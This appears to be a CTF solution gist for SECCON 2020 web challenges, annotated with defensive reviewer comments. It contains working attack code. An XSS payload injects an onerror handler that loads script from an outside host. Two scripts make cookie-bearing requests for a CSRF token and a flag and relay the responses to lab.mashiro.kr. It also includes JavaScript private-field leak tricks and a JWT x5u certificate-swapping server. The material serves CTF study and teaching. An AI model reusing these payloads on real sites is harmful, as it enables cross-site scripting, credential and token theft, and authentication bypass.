@shpik-kr
Last active October 12, 2020 14:00
SECCON 2020 - Web
// Redefinition of the TypeScript-emitted helper used for `#private` field writes.
// It is the standard helper plus one extra line that reads the WeakMap entry for
// `flag` and logs it. `flag` is a free variable here; it is assumed to exist in
// the surrounding scope (not shown on this page).
//
// Takeaway for reviewers: when `#private` fields are down-levelled to WeakMaps,
// their confidentiality depends on the helper and the WeakMap staying out of
// reach. Code that can rebind the helper in the same scope can read the stored
// values, so down-levelled private fields are not a security boundary.
var __classPrivateFieldSet = function (receiver, privateMap, value) {
  const isInstance = privateMap.has(receiver);
  if (!isInstance) {
    throw new TypeError("attempted to set private field on non-instance");
  }

  privateMap.set(receiver, value);

  // The only line that differs from the stock helper: look up `flag` in the
  // same WeakMap and print whatever is stored for it.
  const stored = privateMap.get(flag);
  console.log(stored);

  return value;
};
// Constructing a Flag presumably performs a private-field write, which would be
// routed through the redefined __classPrivateFieldSet helper. The Flag class is
// not shown on this page, so confirm against the challenge source.
new Flag("1234")
// SECCON{Player_WorldOfFantasy_StereoWorXxX_CapsLock_WaveRunner}
const util = require('util');
const inspector = require('inspector');
// Reads an object's native `#private` fields through Node's built-in inspector
// (the V8 debugging protocol) from inside the same process.
//
// Takeaway for reviewers: `#private` is language-level encapsulation, not a
// confidentiality boundary. Any code that can load the `inspector` module can ask
// the runtime for `privateProperties`. Secrets must not share a process with
// untrusted code that can reach `require`.
const session = new inspector.Session();
session.connect();

// Makes `flag` reachable under the name `aa` for the evaluated expression by
// hanging it off the prototype of `this`. Which object `this` is depends on how
// the snippet is loaded (not shown here).
this.__proto__.aa = flag;

// Second step: print the private fields reported for the remote object.
const onProperties = (error, { privateProperties }) => {
  console.log('private properties', privateProperties);
};

// First step: print the remote-object handle, then request its properties.
const onEvaluated = (error, { result }) => {
  console.log(result);
  session.post('Runtime.getProperties', { objectId: result.objectId }, onProperties);
};

session.post('Runtime.evaluate', { expression: `aa;` }, onEvaluated);
// SECCON{HighCollarGirl_CutieCinem@Replay_PhonyPhonic_S.F.SoundFurniture}
# index.html (for reporting)
<!--
  Page handed to the challenge's reporting feature: it only redirects the visiting
  browser to a note URL on the challenge site.
  The `_` query value carries an `onerror=` handler that loads a script from a
  third-party host, so the note page presumably reflects that parameter into an
  element without quoting or escaping it (the server code is not shown here).
  Defensive notes: encode reflected parameters for their output context, and use a
  Content-Security-Policy that forbids inline event handlers and restricts
  script-src to known origins.
-->
<script>
location.href="https://milk-revenge.chal.seccon.jp/note.php/..;/note.php?id=5f820da700115b0700127762&_=a%20onerror=$.getScript(%27https://lab.mashiro.kr/bb.js%27);";
</script>
# aa.js
// Requests the API's /csrf-token endpoint with the visitor's cookies attached
// (withCredentials) and forwards the response body to a second host as a query
// parameter.
//
// Takeaway for reviewers: a script running in an origin the API trusts can read
// every credentialed response that origin may read, including anti-CSRF tokens.
// A CSRF token therefore offers no protection once script injection exists on
// the trusted origin. A restrictive script-src / connect-src CSP limits both the
// script load and the outbound request.
var xhr = new XMLHttpRequest();

xhr.onreadystatechange = function () {
  // Act only once the response has fully arrived.
  if (xhr.readyState !== xhr.DONE) {
    return;
  }
  let relay = new XMLHttpRequest();
  relay.open('GET', 'https://lab.mashiro.kr/?c=' + xhr.responseText);
  relay.send();
};

xhr.withCredentials = true;
xhr.open('GET', 'https://milk-revenge-api.chal.seccon.jp/csrf-token?_=aaaaaaaaaaaaaaaaaaaaaaaaaaaa');
xhr.send();
# bb.js
// Same pattern as aa.js, pointed at /notes/flag: a credentialed request carrying
// a previously obtained token, whose response body is forwarded to a second
// host as a query parameter.
//
// Takeaway for reviewers: the token travels in the query string and is accepted
// from a script-initiated, cookie-bearing request. Binding sensitive reads to
// something injected script cannot obtain, and constraining connect-src via CSP,
// are the controls to check here.
var xhr = new XMLHttpRequest();

xhr.onreadystatechange = function () {
  // Act only once the response has fully arrived.
  if (xhr.readyState !== xhr.DONE) {
    return;
  }
  let relay = new XMLHttpRequest();
  relay.open('GET', 'https://lab.mashiro.kr/?c=' + xhr.responseText);
  relay.send();
};

xhr.withCredentials = true;
xhr.open('GET', 'https://milk-revenge-api.chal.seccon.jp/notes/flag?token=c5fe8848-9278-404f-9dfe-2ede7f41077c');
xhr.send();
milk: SECCON{I_am_heavily_concerning_about_unintended_sols_so_I_dont_put_any_spoiler_here_but_anyway_congrats!}
milk revenge: SECCON{Okay_there_was_actually_unintended_solution_as_I_intended_blahblah}
1. Make a JWT and sign it with any private key.
2. Change the x5u URL to point at the server below, which runs app.py.
3. get flag: SECCON{1_w0uLd_L1K3_70_347_r4M3N_1N5734d_0f_p4574}
# app.py
from flask import Flask
# Module-level toggle shared by every request: while it is False, the next
# /root.crt request is answered with the certificate file; the handler flips it
# on each call.
c = False
app = Flask(__name__)
@app.route("/root.crt")
def aa():
    """Serve ``root.crt`` on every other request.

    Call 1, 3, 5, ...: flips the module-level flag ``c`` to True and returns the
    contents of the local file ``root.crt``.
    Call 2, 4, 6, ...: flips ``c`` back to False, prints "hello" and returns
    None, which Flask does not accept as a response, so the request fails.

    NOTE(review): the alternating answers suggest the JWT verifier under test
    fetches the ``x5u`` URL more than once and treats the fetches differently;
    the verifier is not shown on this page. Defensive reading: ``x5u`` is
    attacker-controlled header data, so a verifier should fetch only from an
    allow-listed location and validate the same certificate bytes it then uses
    for signature verification.
    """
    global c
    if c != False:
        # Even-numbered call: reset the toggle and deliberately return nothing.
        c = False
        print("hello")
        return None
    # Odd-numbered call: arm the toggle and hand back the certificate file.
    c = True
    with open("root.crt") as handle:
        return handle.read()
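if __name__ == "__main__":
    # debug=True enables Werkzeug's interactive debugger and the reloader. With
    # host="0.0.0.0" the debugger would be reachable from any network the machine
    # is on, allowing code execution on this host. Keep debug off whenever the
    # server listens on all interfaces.
    app.run(host="0.0.0.0", port=2368, debug=False)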